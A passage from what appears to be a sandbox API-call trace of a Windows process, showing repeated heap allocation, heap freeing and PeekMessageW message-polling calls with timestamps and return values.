hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b38 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d00 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.499] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b18 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.499] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.499] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d00 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.500] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.500] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d00 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d00 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.500] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.500] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.500] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.501] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.502] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.503] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.504] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.505] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.506] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, 